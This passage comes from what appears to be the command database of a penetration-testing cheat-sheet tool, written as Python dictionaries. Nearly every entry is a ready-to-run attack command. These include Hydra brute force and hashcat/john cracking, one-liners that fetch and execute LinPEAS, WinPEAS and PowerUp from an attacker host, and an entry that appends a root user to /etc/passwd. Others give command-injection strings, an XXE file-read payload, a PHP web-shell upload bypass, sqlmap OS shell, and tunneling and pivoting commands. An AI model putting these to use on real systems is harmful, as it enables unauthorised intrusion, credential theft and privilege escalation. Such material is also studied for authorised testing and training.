        "tags": ["hydra", "ssh", "brute", "password"],
    },
    {
        "id": "pass-hydra-ftp",
        "name": "Hydra FTP",
        "category": "Password Attacks",
        "command": "hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://{RHOST}",
        "description": "FTP brute force",
        "tags": ["hydra", "ftp", "brute", "password"],
    },
    {
        "id": "pass-hydra-http-post",
        "name": "Hydra HTTP POST form",
        "category": "Password Attacks",
        "command": "hydra -l admin -P /usr/share/wordlists/rockyou.txt {RHOST} http-post-form \"/login:username=^USER^&password=^PASS^:F=Invalid\"",
        "description": "Web login form brute force — adjust path and failure string",
        "tags": ["hydra", "http", "form", "brute", "password", "web"],
    },
    {
        "id": "pass-hydra-http-basic",
        "name": "Hydra HTTP basic auth",
        "category": "Password Attacks",
        "command": "hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://{RHOST}/protected",
        "description": "HTTP basic authentication brute force",
        "tags": ["hydra", "http", "basic", "auth", "brute"],
    },
    {
        "id": "pass-hashcat-md5",
        "name": "Hashcat MD5 (-m 0)",
        "category": "Password Attacks",
        "command": "hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt",
        "description": "Crack MD5 hashes",
        "tags": ["hashcat", "md5", "crack", "password"],
    },
    {
        "id": "pass-hashcat-ntlm",
        "name": "Hashcat NTLM (-m 1000)",
        "category": "Password Attacks",
        "command": "hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt",
        "description": "Crack NTLM hashes — Windows password hashes",
        "tags": ["hashcat", "ntlm", "crack", "windows", "password"],
    },
    {
        "id": "pass-hashcat-netntlmv2",
        "name": "Hashcat NetNTLMv2 (-m 5600)",
        "category": "Password Attacks",
        "command": "hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt",
        "description": "Crack NetNTLMv2 hashes (captured via Responder/SMB)",
        "tags": ["hashcat", "netntlm", "crack", "windows", "password"],
    },
    {
        "id": "pass-hashcat-kerberoast",
        "name": "Hashcat Kerberoast (-m 13100)",
        "category": "Password Attacks",
        "command": "hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt",
        "description": "Crack TGS-REP tickets from Kerberoasting",
        "tags": ["hashcat", "kerberoast", "kerberos", "crack", "ad"],
    },
    {
        "id": "pass-hashcat-asrep",
        "name": "Hashcat AS-REP (-m 18200)",
        "category": "Password Attacks",
        "command": "hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt",
        "description": "Crack AS-REP hashes from AS-REP roasting",
        "tags": ["hashcat", "asrep", "kerberos", "crack", "ad"],
    },
    {
        "id": "pass-hashcat-bcrypt",
        "name": "Hashcat bcrypt (-m 3200)",
        "category": "Password Attacks",
        "command": "hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt",
        "description": "Crack bcrypt hashes — slow, use a targeted wordlist",
        "tags": ["hashcat", "bcrypt", "crack", "password"],
    },
    {
        "id": "pass-hashcat-rules",
        "name": "Hashcat with rules",
        "category": "Password Attacks",
        "command": "hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule",
        "description": "Apply mutation rules for better coverage",
        "tags": ["hashcat", "rules", "crack", "password"],
    },
    {
        "id": "pass-john-basic",
        "name": "John the Ripper",
        "category": "Password Attacks",
        "command": "john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt",
        "description": "Crack with john using rockyou",
        "tags": ["john", "crack", "password"],
    },
    {
        "id": "pass-ssh2john",
        "name": "SSH key to john hash",
        "category": "Password Attacks",
        "command": "ssh2john id_rsa > id_rsa.hash && john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash",
        "description": "Crack a passphrase-protected SSH private key",
        "tags": ["john", "ssh", "ssh2john", "crack"],
    },
    {
        "id": "pass-zip2john",
        "name": "ZIP to john hash",
        "category": "Password Attacks",
        "command": "zip2john archive.zip > zip.hash && john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash",
        "description": "Crack a password-protected ZIP archive",
        "tags": ["john", "zip", "zip2john", "crack"],
    },

    # ── Linux PrivEsc ─────────────────────────────────────────────────────────
    {
        "id": "lpe-linpeas",
        "name": "LinPEAS (download & run)",
        "category": "Linux PrivEsc",
        "command": "curl -s http://{LHOST}:8080/linpeas.sh | sh",
        "description": "Download and run LinPEAS from your HTTP server",
        "tags": ["linpeas", "privesc", "linux", "enum"],
    },
    {
        "id": "lpe-linpeas-tee",
        "name": "LinPEAS (save output)",
        "category": "Linux PrivEsc",
        "command": "curl -s http://{LHOST}:8080/linpeas.sh | sh 2>&1 | tee /tmp/lpe.txt",
        "description": "Run LinPEAS and save output for review",
        "tags": ["linpeas", "privesc", "linux", "enum"],
    },
    {
        "id": "lpe-suid",
        "name": "Find SUID binaries",
        "category": "Linux PrivEsc",
        "command": "find / -perm -4000 -type f 2>/dev/null",
        "description": "Find all SUID binaries — check each on GTFOBins",
        "tags": ["suid", "privesc", "linux", "find"],
    },
    {
        "id": "lpe-capabilities",
        "name": "Find capabilities",
        "category": "Linux PrivEsc",
        "command": "getcap -r / 2>/dev/null",
        "description": "Find binaries with dangerous capabilities (cap_setuid, cap_net_raw etc)",
        "tags": ["capabilities", "getcap", "privesc", "linux"],
    },
    {
        "id": "lpe-sudo-l",
        "name": "Check sudo permissions",
        "category": "Linux PrivEsc",
        "command": "sudo -l",
        "description": "List sudo rules — check allowed binaries on GTFOBins",
        "tags": ["sudo", "privesc", "linux"],
    },
    {
        "id": "lpe-crontab",
        "name": "Check crontabs",
        "category": "Linux PrivEsc",
        "command": "crontab -l; cat /etc/crontab; ls -la /etc/cron*; ls -la /var/spool/cron/crontabs/",
        "description": "Look for writable scripts called by cron jobs",
        "tags": ["cron", "crontab", "privesc", "linux"],
    },
    {
        "id": "lpe-writable-paths",
        "name": "Find world-writable directories",
        "category": "Linux PrivEsc",
        "command": "find / -writable -type d 2>/dev/null | grep -v proc",
        "description": "Writable directories — useful for dropping scripts",
        "tags": ["writable", "write", "privesc", "linux"],
    },
    {
        "id": "lpe-passwd-writable",
        "name": "Check /etc/passwd writable",
        "category": "Linux PrivEsc",
        "command": "ls -la /etc/passwd; ls -la /etc/shadow",
        "description": "If /etc/passwd is writable you can add a root user",
        "tags": ["passwd", "shadow", "privesc", "linux"],
    },
    {
        "id": "lpe-add-root-user",
        "name": "Add root user to /etc/passwd",
        "category": "Linux PrivEsc",
        "command": "echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:root:/root:/bin/bash' >> /etc/passwd",
        "description": "If /etc/passwd is writable — add user 'hacker' with password 'hacker' and UID 0. Verify with: su hacker",
        "tags": ["passwd", "root", "privesc", "linux"],
    },
    {
        "id": "lpe-network",
        "name": "Internal network services",
        "category": "Linux PrivEsc",
        "command": "ss -tlnp; netstat -tlnp 2>/dev/null",
        "description": "Find services listening only on localhost — potential pivot targets",
        "tags": ["network", "services", "ss", "netstat", "privesc", "linux"],
    },
    {
        "id": "lpe-process-watch",
        "name": "Watch processes (pspy style)",
        "category": "Linux PrivEsc",
        "command": "curl -s http://{LHOST}:8080/pspy64 -o /tmp/pspy && chmod +x /tmp/pspy && /tmp/pspy",
        "description": "Monitor processes without root — find scheduled tasks and cron details",
        "tags": ["pspy", "process", "monitor", "privesc", "linux"],
    },
    {
        "id": "lpe-path-hijack",
        "name": "Check PATH for hijacking",
        "category": "Linux PrivEsc",
        "command": "echo $PATH; find / -type f -perm -o+w 2>/dev/null | grep -v proc | head -20",
        "description": "Look for writable directories in PATH for binary hijacking",
        "tags": ["path", "hijack", "privesc", "linux"],
    },

    # ── Windows PrivEsc ───────────────────────────────────────────────────────
    {
        "id": "wpe-winpeas",
        "name": "WinPEAS download & run",
        "category": "Windows PrivEsc",
        "command": "certutil -urlcache -f http://{LHOST}:8080/winPEASx64.exe C:\\Windows\\Temp\\wp.exe & C:\\Windows\\Temp\\wp.exe",
        "description": "Download and run WinPEAS in one line",
        "tags": ["winpeas", "privesc", "windows", "enum"],
    },
    {
        "id": "wpe-whoami-priv",
        "name": "Check privileges",
        "category": "Windows PrivEsc",
        "command": "whoami /priv && whoami /groups",
        "description": "Check current privileges and group membership",
        "tags": ["whoami", "priv", "privesc", "windows"],
    },
    {
        "id": "wpe-unquoted-service",
        "name": "Unquoted service paths",
        "category": "Windows PrivEsc",
        "command": "wmic service get name,displayname,pathname,startmode | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v \"\\\"\"",
        "description": "Find services with unquoted paths containing spaces",
        "tags": ["service", "unquoted", "privesc", "windows"],
    },
    {
        "id": "wpe-always-install",
        "name": "AlwaysInstallElevated check",
        "category": "Windows PrivEsc",
        "command": "reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated & reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated",
        "description": "If both are 1, you can install MSI as SYSTEM",
        "tags": ["alwaysinstallelevated", "msi", "privesc", "windows"],
    },
    {
        "id": "wpe-powerup",
        "name": "PowerUp Invoke-AllChecks",
        "category": "Windows PrivEsc",
        "command": "IEX(New-Object Net.WebClient).DownloadString('http://{LHOST}:8080/PowerUp.ps1'); Invoke-AllChecks",
        "description": "PowerShell privesc checker — finds misconfigurations automatically",
        "tags": ["powerup", "privesc", "windows", "powershell"],
    },
    {
        "id": "wpe-sysinfo",
        "name": "System info & patches",
        "category": "Windows PrivEsc",
        "command": "systeminfo && wmic qfe list brief",
        "description": "OS version and installed hotfixes — look for missing patches",
        "tags": ["systeminfo", "patches", "privesc", "windows"],
    },
    {
        "id": "wpe-service-perms",
        "name": "Weak service permissions",
        "category": "Windows PrivEsc",
        "command": "accesschk.exe -wuvc Everyone * 2>nul | findstr /v \"No matching\"",
        "description": "Find services writable by Everyone/Users",
        "tags": ["accesschk", "service", "permissions", "privesc", "windows"],
    },
    {
        "id": "wpe-stored-creds",
        "name": "Stored credentials",
        "category": "Windows PrivEsc",
        "command": "cmdkey /list && net user && type C:\\Users\\*\\AppData\\Local\\Microsoft\\Credentials\\* 2>nul",
        "description": "Check stored Windows credentials",
        "tags": ["credentials", "cmdkey", "privesc", "windows"],
    },
    {
        "id": "wpe-runascs",
        "name": "RunasCs (run as another user)",
        "category": "Windows PrivEsc",
        "command": ".\\RunasCs.exe username password cmd.exe -r {LHOST}:{LPORT}",
        "description": "Run command as a different Windows user — great for lateral movement",
        "tags": ["runascs", "runas", "lateral", "windows"],
    },

    # ── Tunneling ─────────────────────────────────────────────────────────────
    {
        "id": "tun-chisel-server",
        "name": "Chisel server (attacker)",
        "category": "Tunneling",
        "command": "chisel server -p 8000 --reverse",
        "description": "Start chisel listener — target connects back to this",
        "tags": ["chisel", "tunnel", "pivot"],
    },
    {
        "id": "tun-chisel-client",
        "name": "Chisel reverse port forward",
        "category": "Tunneling",
        "command": "chisel client {LHOST}:8000 R:8080:127.0.0.1:8080",
        "description": "Expose target's internal port 8080 to your localhost:8080",
        "tags": ["chisel", "tunnel", "pivot", "portforward"],
    },
    {
        "id": "tun-chisel-socks",
        "name": "Chisel SOCKS5 proxy",
        "category": "Tunneling",
        "command": "# Attacker:\nchisel server -p 8000 --reverse --socks5\n# Target:\nchisel client {LHOST}:8000 R:socks",
        "description": "Full SOCKS5 proxy through target — use with proxychains on localhost:1080",
        "tags": ["chisel", "socks5", "proxy", "pivot"],
    },
    {
        "id": "tun-ssh-local",
        "name": "SSH local port forward",
        "category": "Tunneling",
        "command": "ssh -L 8080:127.0.0.1:8080 user@{RHOST} -N",
        "description": "Access target's localhost:8080 via your localhost:8080",
        "tags": ["ssh", "local", "portforward", "tunnel"],
    },
    {
        "id": "tun-ssh-remote",
        "name": "SSH remote port forward",
        "category": "Tunneling",
        "command": "ssh -R 4444:127.0.0.1:4444 user@{LHOST} -N",
        "description": "Expose your port 4444 on the target — useful for reverse shells through NAT",
        "tags": ["ssh", "remote", "portforward", "tunnel"],
    },
    {
        "id": "tun-ssh-socks",
        "name": "SSH dynamic SOCKS proxy",
        "category": "Tunneling",
        "command": "ssh -D 1080 user@{RHOST} -N && proxychains nmap -sT -Pn {RHOST}",
        "description": "SOCKS5 proxy via SSH for pivoting into internal networks",
        "tags": ["ssh", "socks", "dynamic", "proxy", "pivot"],
    },
    {
        "id": "tun-ligolo",
        "name": "Ligolo-ng (agent on target)",
        "category": "Tunneling",
        "command": "./agent -connect {LHOST}:11601 -ignore-cert",
        "description": "Run on target — ligolo-ng is fast and supports full layer-3 tunneling",
        "tags": ["ligolo", "tunnel", "pivot", "agent"],
    },
    {
        "id": "tun-socat-forward",
        "name": "Socat port relay",
        "category": "Tunneling",
        "command": "socat TCP-LISTEN:8080,fork TCP:{RHOST}:80",
        "description": "Forward local 8080 to target port 80 — useful pivot relay",
        "tags": ["socat", "relay", "portforward", "tunnel"],
    },

    # ── Web Attacks ───────────────────────────────────────────────────────────
    {
        "id": "wa-sqlmap-basic",
        "name": "SQLmap basic",
        "category": "Web Attacks",
        "command": "sqlmap -u \"http://{RHOST}/page.php?id=1\" --dbs --batch",
        "description": "Detect SQLi and enumerate databases",
        "tags": ["sqlmap", "sqli", "injection", "web"],
    },
    {
        "id": "wa-sqlmap-post",
        "name": "SQLmap POST request",
        "category": "Web Attacks",
        "command": "sqlmap -u \"http://{RHOST}/login.php\" --data=\"username=test&password=test\" --dbs --batch",
        "description": "Test POST body parameters for SQLi",
        "tags": ["sqlmap", "sqli", "post", "web"],
    },
    {
        "id": "wa-sqlmap-dump",
        "name": "SQLmap dump table",
        "category": "Web Attacks",
        "command": "sqlmap -u \"http://{RHOST}/page.php?id=1\" -D DBNAME -T TABLENAME --dump --batch",
        "description": "Dump a specific database table",
        "tags": ["sqlmap", "sqli", "dump", "web"],
    },
    {
        "id": "wa-sqlmap-os-shell",
        "name": "SQLmap OS shell",
        "category": "Web Attacks",
        "command": "sqlmap -u \"http://{RHOST}/page.php?id=1\" --os-shell --batch",
        "description": "Attempt to get OS command execution through SQLi",
        "tags": ["sqlmap", "sqli", "os-shell", "rce", "web"],
    },
    {
        "id": "wa-lfi-basic",
        "name": "LFI path traversal",
        "category": "Web Attacks",
        "command": "curl \"http://{RHOST}/page.php?file=../../../../etc/passwd\"",
        "description": "Basic LFI test — try /etc/passwd",
        "tags": ["lfi", "traversal", "web", "injection"],
    },
    {
        "id": "wa-lfi-php-filter",
        "name": "LFI PHP filter (source read)",
        "category": "Web Attacks",
        "command": "curl \"http://{RHOST}/page.php?file=php://filter/convert.base64-encode/resource=index.php\" | grep -oP '(?<=<p>)[^<]+' | base64 -d",
        "description": "Read PHP source via php://filter wrapper",
        "tags": ["lfi", "php", "filter", "source", "web"],
    },
    {
        "id": "wa-cmd-injection",
        "name": "Command injection test strings",
        "category": "Web Attacks",
        "command": "; id\n| id\n|| id\n& id\n&& id\n`id`\n$(id)",
        "description": "Try these in form fields and URL params — any output confirms RCE",
        "tags": ["cmdi", "injection", "rce", "web"],
    },
    {
        "id": "wa-xxe",
        "name": "XXE file read",
        "category": "Web Attacks",
        "command": "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>",
        "description": "XXE payload to read /etc/passwd — inject into XML body",
        "tags": ["xxe", "xml", "injection", "web"],
    },
    {
        "id": "wa-upload-bypass",
        "name": "File upload bypass",
        "category": "Web Attacks",
        "command": "# Try: shell.php → shell.php.jpg, shell.pHp, shell.phtml, shell.php5, shell.shtml\n# Change Content-Type to image/jpeg\n# Add magic bytes: GIF89a<?php system($_GET['cmd']); ?>",
        "description": "Common file upload restriction bypasses",
        "tags": ["upload", "bypass", "web", "rce"],
    },

    # ── DNS ───────────────────────────────────────────────────────────────────
    {
        "id": "dns-dig-basic",
        "name": "dig basic lookup",
        "category": "DNS",
        "command": "dig {RHOST}; dig -x {RHOST}",
        "description": "Forward and reverse DNS lookup",
        "tags": ["dig", "dns", "lookup"],
    },
    {
        "id": "dns-axfr",
        "name": "DNS zone transfer (AXFR)",
        "category": "DNS",
        "command": "dig axfr @{RHOST} DOMAIN.LOCAL",
        "description": "Attempt zone transfer — dumps all DNS records if misconfigured",
        "tags": ["dig", "axfr", "zone", "transfer", "dns"],
    },
    {
        "id": "dns-dnsrecon",
        "name": "dnsrecon full",
        "category": "DNS",
        "command": "dnsrecon -d DOMAIN.LOCAL -n {RHOST} -a",
        "description": "Full DNS recon including zone transfer attempt",
        "tags": ["dnsrecon", "dns", "enum"],
    },
    {
        "id": "dns-dnsenum",
        "name": "dnsenum brute",
        "category": "DNS",
        "command": "dnsenum --dnsserver {RHOST} --enum -p 0 -s 0 -o dnsenum-out.xml DOMAIN.LOCAL",
        "description": "DNS enumeration with subdomain brute force",
        "tags": ["dnsenum", "dns", "brute", "enum"],
    },
    {
        "id": "dns-fierce",
        "name": "fierce subdomain scan",
        "category": "DNS",
        "command": "fierce --domain DOMAIN.LOCAL --dns-server {RHOST}",
        "description": "Subdomain enumeration and DNS recon",
        "tags": ["fierce", "dns", "subdomain", "enum"],
    },

    # ── Miscellaneous ─────────────────────────────────────────────────────────
    {
        "id": "misc-responder",
        "name": "Responder (LLMNR/NBT-NS poisoning)",
        "category": "Miscellaneous",
        "command": "responder -I tun0 -wv",
        "description": "Capture NetNTLMv2 hashes on the network — crack with hashcat -m 5600",
        "tags": ["responder", "llmnr", "ntlm", "hash", "capture"],
    },
    {
        "id": "misc-searchsploit",
        "name": "searchsploit",
        "category": "Miscellaneous",
        "command": "searchsploit 'service name version'",
        "description": "Search local exploit-db database for known exploits",
        "tags": ["searchsploit", "exploitdb", "exploit"],
    },
    {
        "id": "misc-snmpwalk",
        "name": "snmpwalk community scan",
        "category": "Miscellaneous",
        "command": "snmpwalk -v2c -c public {RHOST} && onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt {RHOST}",
        "description": "SNMP enumeration — often reveals usernames, software, configs",
        "tags": ["snmp", "snmpwalk", "onesixtyone", "enum"],
    },
    {
        "id": "misc-tcpdump",
        "name": "tcpdump capture",
        "category": "Miscellaneous",
        "command": "tcpdump -i tun0 -w /tmp/capture.pcap",
        "description": "Capture packets on VPN interface for offline analysis",
        "tags": ["tcpdump", "capture", "pcap", "network"],
    },
    {
        "id": "misc-hashid",
        "name": "Identify hash type",
        "category": "Miscellaneous",
        "command": "hashid 'HASHVALUE' && hash-identifier 'HASHVALUE'",
        "description": "Identify hash algorithm before cracking",
        "tags": ["hashid", "hash", "identify"],
    },
    {
        "id": "misc-passwd-hash",
        "name": "Generate /etc/passwd hash",
        "category": "Miscellaneous",
        "command": "openssl passwd -1 -salt hacker 'password123'",
        "description": "Generate MD5-crypt hash for /etc/passwd injection",
        "tags": ["openssl", "passwd", "hash", "generate"],
    },
    {
        "id": "misc-grep-creds",
        "name": "Grep for credentials in files",
        "category": "Miscellaneous",
        "command": "grep -rni 'password\\|passwd\\|secret\\|api_key\\|token' /var/www/ 2>/dev/null | grep -v '.git'",
        "description": "Hunt for hardcoded credentials in web roots and config files",
        "tags": ["grep", "credentials", "password", "hunt"],
    },
    {
        "id": "misc-ftp-anon",
        "name": "FTP anonymous login",
        "category": "Miscellaneous",
        "command": "ftp -n {RHOST} <<EOF\nuser anonymous\nls -la\nEOF",
        "description": "Test FTP anonymous access",
        "tags": ["ftp", "anonymous", "anon", "login"],
    },
    {
        "id": "misc-mysql-connect",
        "name": "MySQL connect",
        "category": "Miscellaneous",
        "command": "mysql -h {RHOST} -u root -p",
        "description": "Connect to remote MySQL — try blank/root password",
        "tags": ["mysql", "database", "connect"],
    },
    {
        "id": "misc-redis",
        "name": "Redis unauthenticated",
        "category": "Miscellaneous",
        "command": "redis-cli -h {RHOST} ping && redis-cli -h {RHOST} info",
        "description": "Connect to Redis — often unauthenticated, can lead to RCE",
        "tags": ["redis", "database", "rce"],
    },
]
